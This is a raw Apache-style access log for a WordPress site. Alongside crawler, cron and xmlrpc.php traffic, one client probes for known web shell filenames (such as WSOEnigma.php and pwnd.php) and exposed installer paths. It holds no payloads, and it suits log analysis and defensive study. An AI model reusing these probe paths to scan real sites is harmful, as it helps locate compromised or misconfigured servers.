13.229.78.155 - - [01/Apr/2025:12:57:58 -0400] "GET /WSOEnigma.php HTTP/1.1" 404 9259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:57:59 -0400] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 404 9259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:58:00 -0400] "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 404 9259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:58:02 -0400] "GET /wp-content/plugins/clara/clara.php HTTP/1.1" 404 9259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
216.244.66.196 - - [01/Apr/2025:13:06:12 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:13:16:30 -0400] "POST /wp-cron.php?doing_wp_cron=1743527790.6760389804840087890625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
94.102.51.15 - - [01/Apr/2025:13:16:30 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:16.0) Gecko/20100101 Firefox/16.0"
198.54.114.83 - - [01/Apr/2025:13:19:27 -0400] "POST /wp-cron.php?doing_wp_cron=1743527967.1214210987091064453125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
185.220.100.252 - - [01/Apr/2025:13:19:24 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "https://www.google.com/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
198.54.114.83 - - [01/Apr/2025:13:22:00 -0400] "POST /wp-cron.php?doing_wp_cron=1743528119.6215960979461669921875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
198.177.120.19 - - [01/Apr/2025:13:21:55 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://sunquicksf.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50"
198.54.114.83 - - [01/Apr/2025:13:28:48 -0400] "POST /wp-cron.php?doing_wp_cron=1743528527.9625420570373535156250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
13.229.78.155 - - [01/Apr/2025:13:28:40 -0400] "GET /wp-cli.php HTTP/1.1" 404 9259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
4.227.36.56 - - [01/Apr/2025:13:45:35 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [01/Apr/2025:13:48:33 -0400] "POST /wp-cron.php?doing_wp_cron=1743529712.1902539730072021484375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
9.169.158.7 - - [01/Apr/2025:13:48:32 -0400] "HEAD /wordpress HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.158.7 - - [01/Apr/2025:13:48:34 -0400] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.158.7 - - [01/Apr/2025:13:48:34 -0400] "HEAD /wp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.158.7 - - [01/Apr/2025:13:48:35 -0400] "HEAD /bc HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.158.7 - - [01/Apr/2025:13:48:37 -0400] "HEAD /bk HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.158.7 - - [01/Apr/2025:13:48:37 -0400] "HEAD /backup HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.158.7 - - [01/Apr/2025:13:48:38 -0400] "HEAD /old HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.158.7 - - [01/Apr/2025:13:48:38 -0400] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.158.7 - - [01/Apr/2025:13:48:39 -0400] "HEAD /main HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.158.7 - - [01/Apr/2025:13:48:40 -0400] "HEAD /home HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
162.213.255.38 - - [01/Apr/2025:13:48:56 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://sunquicksf.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
20.171.207.96 - - [01/Apr/2025:13:52:42 -0400] "GET /?p=11109 HTTP/1.1" 200 97711 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [01/Apr/2025:14:40:34 -0400] "POST /wp-cron.php?doing_wp_cron=1743532833.4751720428466796875000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
13.229.78.155 - - [01/Apr/2025:14:40:32 -0400] "GET /wp-admin/install.php?step=1 HTTP/1.1" 200 521 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:35 -0400] "GET /wp-admin/setup-config.php HTTP/1.1" 409 1222 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
198.54.114.83 - - [01/Apr/2025:14:40:37 -0400] "POST /wp-cron.php?doing_wp_cron=1743532836.9835209846496582031250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
13.229.78.155 - - [01/Apr/2025:14:40:36 -0400] "GET /new/wp-admin/install.php?step=1 HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:39 -0400] "GET /new/wp-admin/setup-config.php HTTP/1.1" 404 9258 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:40 -0400] "GET /blog/wp-admin/install.php?step=1 HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:41 -0400] "GET /blog/wp-admin/setup-config.php HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:43 -0400] "GET /blogs/wp-admin/install.php?step=1 HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:44 -0400] "GET /blogs/wp-admin/setup-config.php HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:45 -0400] "GET /demo/wp-admin/install.php?step=1 HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:46 -0400] "GET /demo/wp-admin/setup-config.php HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:47 -0400] "GET /wp/wp-admin/install.php?step=1 HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:48 -0400] "GET /wp/wp-admin/setup-config.php HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:49 -0400] "GET /wordpress/wp-admin/install.php?step=1 HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:50 -0400] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:51 -0400] "GET /tes/wp-admin/install.php?step=1 HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:51 -0400] "GET /tes/wp-admin/setup-config.php HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
2607:f298:5:114b::263:a4ba - - [01/Apr/2025:14:40:52 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://sunquicksf.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:40:52 -0400] "GET /test/wp-admin/install.php?step=1 HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:53 -0400] "GET /test/wp-admin/setup-config.php HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:54 -0400] "GET /web/wp-admin/install.php?step=1 HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
185.220.101.72 - - [01/Apr/2025:14:11:27 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "https://www.google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36"
20.171.207.96 - - [01/Apr/2025:14:34:40 -0400] "GET /?p=10582 HTTP/1.1" 200 97711 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.244.66.196 - - [01/Apr/2025:14:35:17 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
13.229.78.155 - - [01/Apr/2025:14:40:55 -0400] "GET /web/wp-admin/setup-config.php HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:55 -0400] "GET /cms/wp-admin/install.php?step=1 HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:40:58 -0400] "GET /cms/wp-admin/setup-config.php HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:01 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:02 -0400] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
178.217.99.17 - - [01/Apr/2025:14:41:04 -0400] "GET /ally-bank-customer-service/ HTTP/1.1" 200 12590 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:114.0) Gecko/20100101 Firefox/114.0"
64.227.148.69 - - [01/Apr/2025:14:44:32 -0400] "GET /wp-admin/css/ HTTP/1.1" 403 1242 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:14:45:38 -0400] "POST /wp-cron.php?doing_wp_cron=1743533138.5304911136627197265625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
216.244.66.196 - - [01/Apr/2025:14:45:38 -0400] "GET /noxwin-gambling-establishment-opinion-analysis-3/ HTTP/1.1" 200 15860 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:14:53:40 -0400] "POST /wp-cron.php?doing_wp_cron=1743533619.7091560363769531250000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
216.244.66.196 - - [01/Apr/2025:14:53:39 -0400] "GET /the-latest-led-display-technology/ HTTP/1.1" 200 12790 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:15:05:48 -0400] "POST /wp-cron.php?doing_wp_cron=1743534347.7092781066894531250000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
162.0.232.73 - - [01/Apr/2025:15:05:45 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://sunquicksf.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36"
20.171.207.96 - - [01/Apr/2025:15:16:13 -0400] "GET /?p=10110 HTTP/1.1" 200 97711 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.244.66.196 - - [01/Apr/2025:15:20:07 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:15:30:32 -0400] "POST /wp-cron.php?doing_wp_cron=1743535832.5260460376739501953125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
162.0.232.73 - - [01/Apr/2025:15:30:29 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://sunquicksf.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:15:36:14 -0400] "POST /wp-cron.php?doing_wp_cron=1743536174.1297659873962402343750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
194.38.23.16 - - [01/Apr/2025:15:36:11 -0400] "GET /plugins/html5-file-upload/html5fileupload.php HTTP/1.1" 404 9259 "-" "ALittle Client"
94.25.225.84 - - [01/Apr/2025:15:40:05 -0400] "GET /ally-bank-customer-service/ HTTP/1.1" 200 12590 "http://sunquicksf.com/ally-bank-customer-service/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:15:49:56 -0400] "POST /wp-cron.php?doing_wp_cron=1743536996.2700600624084472656250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
13.229.78.155 - - [01/Apr/2025:15:49:53 -0400] "GET /wp-cli.php HTTP/1.1" 404 9260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.26.245.159 - - [01/Apr/2025:15:54:17 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://sunquicksf.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50"
198.54.114.83 - - [01/Apr/2025:16:01:35 -0400] "POST /wp-cron.php?doing_wp_cron=1743537695.3777968883514404296875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
185.220.101.38 - - [01/Apr/2025:16:01:31 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10"
216.244.66.196 - - [01/Apr/2025:16:04:05 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.103.39.36 - - [01/Apr/2025:16:17:24 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://sunquicksf.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0"
85.208.98.23 - - [01/Apr/2025:16:20:09 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
13.229.78.155 - - [01/Apr/2025:16:20:07 -0400] "GET /wp-includes/ID3/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [01/Apr/2025:16:20:14 -0400] "POST /wp-cron.php?doing_wp_cron=1743538812.3469359874725341796875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
13.229.78.155 - - [01/Apr/2025:16:20:16 -0400] "GET /wp-includes/ID3/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:20:18 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 200 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:20:22 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 302 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:20:32 -0400] "GET /wp-includes/IXR/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:20:33 -0400] "GET /wp-includes/IXR/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:20:36 -0400] "GET /wp-admin/images/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:20:37 -0400] "GET /wp-admin/images/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:20:39 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:20:41 -0400] "GET /wp-content/plugins/admin.php HTTP/1.1" 404 9257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:20:43 -0400] "GET /xmlrpc.php HTTP/1.1" 405 60 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:20:47 -0400] "GET /wp-admin.php HTTP/1.1" 404 9257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:20:51 -0400] "GET /wp-content/plugins/Core-Econ/upH.php HTTP/1.1" 404 9257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:20:53 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 9257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:20:55 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 404 9257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:20:58 -0400] "GET /wp-content/plugins/shell/noimg.php HTTP/1.1" 404 9257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:20:59 -0400] "GET /WSOEnigma.php HTTP/1.1" 404 9258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:21:02 -0400] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 404 9258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:21:04 -0400] "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 404 9258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:21:07 -0400] "GET /wp-content/plugins/clara/clara.php HTTP/1.1" 404 9258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
52.167.144.18 - - [01/Apr/2025:16:33:43 -0400] "GET /?p=6172 HTTP/1.1" 200 97711 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:16:40:19 -0400] "POST /wp-cron.php?doing_wp_cron=1743540019.3387739658355712890625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
173.212.223.204 - - [01/Apr/2025:16:40:16 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://sunquicksf.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0"
198.54.114.83 - - [01/Apr/2025:17:05:33 -0400] "POST /wp-cron.php?doing_wp_cron=1743541533.5742969512939453125000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
162.240.153.241 - - [01/Apr/2025:17:05:31 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://sunquicksf.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36"
20.171.207.96 - - [01/Apr/2025:17:08:14 -0400] "GET /?p=10590 HTTP/1.1" 200 97711 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.96 - - [01/Apr/2025:17:08:17 -0400] "GET /?p=10356 HTTP/1.1" 200 97711 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.96 - - [01/Apr/2025:17:09:49 -0400] "GET /?p=11175 HTTP/1.1" 200 97711 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.194.95.99 - - [01/Apr/2025:17:18:35 -0400] "GET /?p=6378 HTTP/1.1" 200 97711 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.64.168 - - [01/Apr/2025:17:27:28 -0400] "GET /robots.txt HTTP/1.1" 200 125 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.167 - - [01/Apr/2025:17:27:28 -0400] "GET / HTTP/1.1" 200 97711 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.54.114.83 - - [01/Apr/2025:17:29:30 -0400] "POST /wp-cron.php?doing_wp_cron=1743542970.7432339191436767578125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
103.7.8.179 - - [01/Apr/2025:17:29:30 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://sunquicksf.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0"
